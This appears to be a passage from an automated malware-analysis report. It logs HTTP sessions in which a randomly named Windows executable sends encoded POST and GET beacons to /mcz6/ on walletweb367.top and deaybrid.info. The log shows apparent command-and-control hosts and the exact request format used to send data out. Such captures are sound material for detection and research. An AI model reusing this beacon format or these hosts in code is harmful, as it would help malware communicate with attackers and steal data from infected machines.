                                                    Date: Thu, 16 May 2024 15:19:57 GMT
                                                    Server: Apache
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                    May 16, 2024 17:19:57.190057039 CEST1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                    Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                    May 16, 2024 17:19:57.194837093 CEST1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                    Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                    May 16, 2024 17:19:57.199682951 CEST975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                    Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.94973191.195.240.123801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:03.048419952 CEST741OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 37 71 35 66 72 37 67 37 4c 47 6a 48 41 78 62 6e 46 73 63 5a 33 54 44 75 46 32 30 71 45 41 59 67 55 54 57 49 53 6f 5a 75 58 43 30 77 57 4d 59 6c 70 63 50 50 45 7a 4a 77 73 35 37 77 59 54 45 74 71 64 67 67 35 71 30 67 39 4e 72 52 58 42 39 6b 42 77 51 79 4c 67 43 55 34 36 4c 44 4b 75 4a 2f 43 46 36 33 51 32 2f 65 78 4a 39 50 33 37 34 58 57 72 61 49 36 49 6a 6f 34 46 61 57 32 5a 49 38 50 4c 57 71 39 6b 71 7a 65 43 6b 4a 5a 6b 79 73 37 45 65 32 78 31 72 45 56 45 46 6c 2b 30 51 55 4a 47 4e 36 67 46 4b 53 47 6b 54 42 68 61 7a 74
                                                    Data Ascii: 1Joh=zJoyZiUMOHpB7q5fr7g7LGjHAxbnFscZ3TDuF20qEAYgUTWISoZuXC0wWMYlpcPPEzJws57wYTEtqdgg5q0g9NrRXB9kBwQyLgCU46LDKuJ/CF63Q2/exJ9P374XWraI6Ijo4FaW2ZI8PLWq9kqzeCkJZkys7Ee2x1rEVEFl+0QUJGN6gFKSGkTBhazt


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.94973291.195.240.123801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:05.587965965 CEST765OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 79 4d 67 56 79 6d 49 41 70 5a 75 55 43 30 77 5a 73 59 67 6b 38 50 79 45 7a 45 44 73 37 2f 77 59 58 73 74 71 5a 6b 67 35 62 30 68 39 64 72 58 43 78 39 6d 4d 51 51 79 4c 67 43 55 34 36 65 6d 4b 75 52 2f 43 52 47 33 42 6b 48 5a 74 35 39 4f 2b 62 34 58 41 62 61 4d 36 49 6a 47 34 45 47 38 32 64 34 38 50 4b 6d 71 38 32 43 77 4a 79 6b 50 48 6b 7a 53 79 46 50 4a 71 55 57 5a 4c 6e 74 56 72 6e 41 6b 4f 6e 74 6b 78 33 44 4a 54 7a 54 6d 6d 39 36 46 56 6b 50 75 67 37 4a 61 49 65 48 64 39 35 51 41 46 2b 6c 6a 57 77 3d 3d
                                                    Data Ascii: 1Joh=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6DyMgVymIApZuUC0wZsYgk8PyEzEDs7/wYXstqZkg5b0h9drXCx9mMQQyLgCU46emKuR/CRG3BkHZt59O+b4XAbaM6IjG4EG82d48PKmq82CwJykPHkzSyFPJqUWZLntVrnAkOntkx3DJTzTmm96FVkPug7JaIeHd95QAF+ljWw==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.94973391.195.240.123801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:08.125835896 CEST1778OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.walletweb367.top
                                                    Referer: http://www.walletweb367.top/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 7a 30 67 55 45 53 49 53 4b 42 75 56 43 30 77 55 4d 59 68 6b 38 50 56 45 7a 73 50 73 37 6a 67 59 52 6f 74 37 4b 73 67 2f 70 51 68 33 64 72 58 41 78 39 6e 42 77 52 71 4c 67 53 51 34 36 4f 6d 4b 75 52 2f 43 58 69 33 52 47 2f 5a 76 35 39 50 33 37 34 62 57 72 61 77 36 4d 48 77 34 48 71 47 33 75 77 38 42 4b 32 71 2f 44 65 77 56 69 6b 4e 54 45 7a 61 79 46 44 6f 71 58 7a 69 4c 6d 49 4f 72 6e 49 6b 4b 42 6f 4f 69 57 50 67 4f 68 4c 67 6d 63 4f 37 4d 6b 75 4c 69 4b 67 5a 4b 4f 6e 4c 69 72 52 75 48 71 34 2f 49 36 41 2f 49 38 6c 65 48 68 77 71 64 6d 66 52 72 64 46 46 4b 68 6e 4d 4a 44 57 6a 55 35 54 56 32 2f 59 63 76 47 74 35 58 53 41 46 71 74 6c 6f 62 47 54 78 59 30 61 56 6a 63 61 55 64 49 67 43 6a 4c 6b 6b 4d 4d 66 4f 4f 68 36 4c 6f 51 52 5a 59 46 35 45 58 50 6c 62 54 31 43 4e 54 76 4e 73 75 50 70 53 62 6f 31 69 43 4a 30 49 77 46 61 47 54 30 48 68 34 2f 74 4c 34 4b 5a 45 56 [TRUNCATED]
                                                    Data Ascii: 1Joh=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6Dz0gUESISKBuVC0wUMYhk8PVEzsPs7jgYRot7Ksg/pQh3drXAx9nBwRqLgSQ46OmKuR/CXi3RG/Zv59P374bWraw6MHw4HqG3uw8BK2q/DewVikNTEzayFDoqXziLmIOrnIkKBoOiWPgOhLgmcO7MkuLiKgZKOnLirRuHq4/I6A/I8leHhwqdmfRrdFFKhnMJDWjU5TV2/YcvGt5XSAFqtlobGTxY0aVjcaUdIgCjLkkMMfOOh6LoQRZYF5EXPlbT1CNTvNsuPpSbo1iCJ0IwFaGT0Hh4/tL4KZEVYyC1rmSvdhy1S/rbZKu6u9JX32RB72OaI6prMgYc+mT66pqvJBqk51VUxSjWTwSnEu2kRV3OvowUB9MYQhM0gGc9E3+nIkYC/9pOlcYkgFVw+smsatAQVTIraWKLvqZqMLi/hyqcBJhMVDfIMwJeGrHy/mE2uhUa1tUZErVZaw+j/BkqrUvwGbRJDAIHTvo24V/Llz61p+BSqtHJMA86zJxE6uYa2UvsHujaJ4c+WSgZ8Y/esoI9Q+ZdBb/8AQO8Cmhd9KSo3Tn+bFPj4jFODqmu9oFaQC/Go4pNJisn8Vtilh4CSyLfdqh+U79GNoa2HJHqM7Gj8hOTYFvVj+xK2ajIC2GidXAwY4si8vq+MpCfrx7QSJbQ4Lw0LrIw6UX+pISQI2baSnxwTK7hTgvSmuwJGlZxpsoTA0qaJbTnxAxOI6oK+915zLv3ApoZ5m4MLr3Waj9jW2NXDXUIWMNMZa+htuVZIY7LQ3zDHMa3xqLFSIDIaVW0uv5xLqlbn/N7WhQ60d7onRGhciaY+Cpn/xnxW1VXfEQ5OhnOA2V5sd/kTPr19zqKTDxWM28e7VAd9ydwOeMPo/IbMXhvaW/waktbrZk9Hzn1QwqEf3bdygoFgQ2XDzaeJ1VC5YvGMg6zL0uK3s2CtigeR2WhXSdDLoyUKhGG22SK7O [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.94973491.195.240.123801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:10.669912100 CEST476OUTGET /mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.949735162.0.237.22801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:26.161324024 CEST732OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 35 42 36 45 77 7a 70 41 74 63 4d 79 61 2f 43 39 4c 4b 2f 44 71 42 50 30 64 69 4a 37 33 71 46 65 4e 70 51 49 53 31 65 7a 55 76 4c 69 42 67 51 6b 30 70 61 77 6b 71 34 4c 53 74 39 6f 43 6a 49 30 72 64 4b 50 52 42 46 53 69 4e 4a 59 69 5a 6e 4d 2b 39 48 76 56 2f 62 5a 62 66 6b 65 47 56 43 44 61 64 53 6d 52 4e 2b 75 32 62 52 53 57 56 46 61 4b 4c 6f 79 2f 53 67 59 79 70 4a 42 6e 68 4b 45 38 56 34 4a 73 6c 38 35 4c 4d 48 59 68 76 53 61 65 6d 63 69 77 4f 50 4e 47 50 5a 52 54 51 62 57 57 74 6f 32 47 78 74 4d 61 78 76 4b 4e 30 37 32
                                                    Data Ascii: 1Joh=U51Zs5j/nfea5B6EwzpAtcMya/C9LK/DqBP0diJ73qFeNpQIS1ezUvLiBgQk0pawkq4LSt9oCjI0rdKPRBFSiNJYiZnM+9HvV/bZbfkeGVCDadSmRN+u2bRSWVFaKLoy/SgYypJBnhKE8V4Jsl85LMHYhvSaemciwOPNGPZRTQbWWto2GxtMaxvKN072


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.949736162.0.237.22801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:28.696790934 CEST756OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 78 65 44 74 63 49 52 30 65 7a 54 76 4c 69 55 51 51 74 70 35 61 4e 6b 71 38 70 53 76 70 6f 43 67 30 30 72 64 36 50 57 32 52 54 6a 64 4a 61 2b 5a 6e 4b 68 4e 48 76 56 2f 62 5a 62 65 42 37 47 56 4b 44 62 74 43 6d 65 4d 2b 74 70 72 52 52 41 46 46 61 42 72 6f 32 2f 53 68 50 79 6f 56 6e 6e 6a 79 45 38 55 49 4a 76 30 38 34 51 38 48 6b 73 50 54 76 52 6e 42 61 2f 63 65 5a 4f 66 35 52 4c 54 7a 64 63 73 49 6f 58 44 6b 58 50 6d 76 74 4b 54 79 65 52 47 36 59 49 49 67 53 6e 69 51 77 30 7a 38 6e 32 31 6f 44 4e 41 3d 3d
                                                    Data Ascii: 1Joh=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIxeDtcIR0ezTvLiUQQtp5aNkq8pSvpoCg00rd6PW2RTjdJa+ZnKhNHvV/bZbeB7GVKDbtCmeM+tprRRAFFaBro2/ShPyoVnnjyE8UIJv084Q8HksPTvRnBa/ceZOf5RLTzdcsIoXDkXPmvtKTyeRG6YIIgSniQw0z8n21oDNA==
                                                    May 16, 2024 17:20:30.030138969 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:29 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.949737162.0.237.22801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:20:31.231916904 CEST1769OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 4a 65 44 65 55 49 57 6e 32 7a 53 76 4c 69 56 51 51 6f 70 35 61 63 6b 71 45 74 53 76 6c 53 43 6c 77 30 72 2b 79 50 54 48 52 54 73 64 4a 61 6d 5a 6e 50 2b 39 47 6c 56 2f 4c 64 62 66 78 37 47 56 4b 44 62 6f 47 6d 61 64 2b 74 36 37 52 53 57 56 46 47 4b 4c 6f 61 2f 53 35 66 79 70 67 61 6d 51 36 45 38 30 59 4a 75 47 55 34 63 38 48 63 69 76 54 33 52 6e 4e 46 2f 63 44 67 4f 66 39 37 4c 54 62 64 51 71 31 2b 44 33 77 4f 59 45 2f 65 4b 67 62 35 4a 53 32 69 42 37 4a 48 6d 44 49 6b 68 58 70 47 79 32 4d 48 50 6a 49 61 6d 57 2b 44 6f 70 2f 49 70 6b 64 2f 49 57 41 42 73 34 4c 71 61 32 2f 75 6b 57 30 45 42 7a 68 62 32 58 38 51 56 56 67 76 50 6e 39 46 33 55 6c 55 5a 6c 67 37 34 48 33 47 7a 7a 4f 4f 49 75 32 75 31 79 6f 4f 6d 57 51 38 2b 44 62 31 47 41 4b 42 54 4d 6b 36 30 63 53 53 76 37 48 76 71 49 73 36 48 67 73 66 43 4f 70 34 39 72 6d 5a 6b 72 66 6e 6a 76 73 61 59 6a 47 46 2b [TRUNCATED]
                                                    Data Ascii: 1Joh=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIJeDeUIWn2zSvLiVQQop5ackqEtSvlSClw0r+yPTHRTsdJamZnP+9GlV/Ldbfx7GVKDboGmad+t67RSWVFGKLoa/S5fypgamQ6E80YJuGU4c8HcivT3RnNF/cDgOf97LTbdQq1+D3wOYE/eKgb5JS2iB7JHmDIkhXpGy2MHPjIamW+Dop/Ipkd/IWABs4Lqa2/ukW0EBzhb2X8QVVgvPn9F3UlUZlg74H3GzzOOIu2u1yoOmWQ8+Db1GAKBTMk60cSSv7HvqIs6HgsfCOp49rmZkrfnjvsaYjGF+CIc9GVbPLNZfgngg9ljKQG0UDc48pphxsnPTT0KbV1D3BgQgmeXFcO4IpZ3GryNgE7/3UIDkrPCTZbOBDdugcKyxXphQ7IcQLQXy9C13xusX3yaBkc974u4K2+aiIHuxNhNxStXay7lhOnexdLy247EiBKY0sTJ26uvOwq0B02i77jkB9f2+pxkDRzN/sznPjwitxgvYsoIO88tL98hpxiRDHA8405kc1e8vZS21VSElyk3TWxoQcdIAzoF/PSsdjI2M2EIMHEUB0wW0A7F9yS0dTq9uLkECppLqMfpPmu9stRufDEXxzNVtQ12v7vna+8ICAKbAsG3jt6/k1DnlgV6V/p8bLydtJpd+hOYiLvSYBIq+xGZLmMRdq5xuI+CVft0fomE+fUbfE7YaLahi+suYsdPW8GvGjTSUn5qW263q5fOKRMj1iH4bt3SBmsoGvJr4D3KEeMD/ItMTh6OXLyI26RE2Mhj26Rp2mkabU9ON5HEd7UuRvCtl9X+BR6iPP7t3Aeo2LDWJKnRjhTpn6HYGw0p31GRzusCLQsOp8Wq4uq9Rl2s466SHwAKBNfWuLNZmIMuSXo05sNgHBNQqpc1+rGyECJMyBXVemKrdC6tR32FF3ubDcqNqLmWKCCdurmi5Jl9nwgP0HHG7bitSiaHLus43w1Ex85 [TRUNCATED]
                                                    May 16, 2024 17:20:32.106977940 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:31 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
